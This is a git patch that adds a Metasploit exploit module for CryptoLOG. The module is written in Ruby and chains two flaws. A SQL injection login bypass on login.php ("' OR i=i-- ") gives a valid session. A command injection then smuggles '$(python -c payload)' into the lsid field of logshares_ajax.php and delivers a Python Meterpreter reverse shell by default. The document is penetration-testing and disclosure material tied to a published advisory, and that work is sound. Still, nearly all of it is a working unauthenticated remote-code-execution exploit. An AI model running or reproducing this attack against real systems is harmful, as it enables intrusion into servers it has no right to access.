From 77acbb82001d0d4e80ba02997ae3b606c2372789 Mon Sep 17 00:00:00 2001 From: Mehmet Ince Date: Wed, 3 May 2017 01:05:40 +0300 Subject: [PATCH] Adding cryptolog rce --- modules/exploits/linux/http/cryptolog_exec.rb | 119 ++++++++++++++++++ 1 file changed, 119 insertions(+) create mode 100644 modules/exploits/linux/http/cryptolog_exec.rb diff --git a/modules/exploits/linux/http/cryptolog_exec.rb b/modules/exploits/linux/http/cryptolog_exec.rb new file mode 100644 index 0000000000..e592eba5ec --- /dev/null +++ b/modules/exploits/linux/http/cryptolog_exec.rb @@ -0,0 +1,119 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' + +class MetasploitModule < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpClient + include Msf::Exploit::Remote::SSH + + def initialize(info={}) + super(update_info(info, + 'Name' => "CryptoLOG Remote Code Execution", + 'Description' => %q{ + This module exploits the sql injection and command injection vulnerability of CryptoLog. An un-authenticated user can execute a + terminal command under the context of the web user. + + login.php endpoint is responsible for login process. One of the user supplied parameter is used by the application without input validation + and parameter binding. Which cause a sql injection vulnerability. Successfully exploitation of this vulnerability gives us the valid session. + + logshares_ajax.php endpoint is repsonsible for executing a operation system command. It's not possible to access this endpoint without having + a valid session. One user parameter is used by the application while executing operating system command which cause a command injection vulnerability + + Combining these vulnerabilities gives us opportunity execute operation system with web user privilege. + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'Mehmet Ince ' # author & msf module + ], + 'References' => + [ + ['URL', 'https://pentest.blog/advisory-cryptolog-unauthenticated-remote-code-execution/'] + ], + 'DefaultOptions' => + { + 'Payload' => 'python/meterpreter/reverse_tcp' + }, + 'Platform' => ['python'], + 'Arch' => ARCH_PYTHON, + 'Targets' => [[ 'Automatic', { }]], + 'Privileged' => false, + 'DisclosureDate' => "May 3 2017", + 'DefaultTarget' => 0 + )) + + register_options( + [ + Opt::RPORT(80), + OptString.new('TARGETURI', [true, 'The URI of the vulnerable CryptoLog instance', '/']) + ], self.class) + end + + def check + r = rand_text_alpha(15) + i = rand_text_numeric(5) + + res = send_request_cgi({ + 'method' => 'POST', + 'uri' => normalize_uri(target_uri.path, 'cryptolog', 'login.php'), + 'vars_get' => { + 'act' => 'login' + }, + 'vars_post' => { + 'user' => "#{r}' OR #{i}=#{i}-- #{r}", + 'pass' => "#{r}" + } + }) + + if res && res.code == 302 && res.headers.include?('Set-Cookie') + Exploit::CheckCode::Appears + else + Exploit::CheckCode::Safe + end + end + + def exploit + print_status("Bypassing login by exploiting SQLi flaw") + + r = rand_text_alpha(15) + i = rand_text_numeric(5) + + res = send_request_cgi({ + 'method' => 'POST', + 'uri' => normalize_uri(target_uri.path, 'cryptolog', 'login.php'), + 'vars_get' => { + 'act' => 'login' + }, + 'vars_post' => { + 'user' => "#{r}' OR #{i}=#{i}-- #{r}", + 'pass' => "#{r}" + } + }) + + if res && res.code == 302 && res.headers.include?('Set-Cookie') + cookie = res.get_cookies + print_good("Successfully logged in") + else + fail_with(Failure::Unknown, "Something went wrong.") + end + + print_status("Exploiting command injection flaw") + + send_request_cgi({ + 'method' => 'POST', + 'uri' => normalize_uri(target_uri.path, 'cryptolog', 'logshares_ajax.php'), + 'cookie' => cookie, + 'vars_post' => { + 'opt' => "check", + 'lsid' => "$(python -c \"#{payload.encoded}\")", + 'lssharetype' => "#{r}" + } + }) + + end +end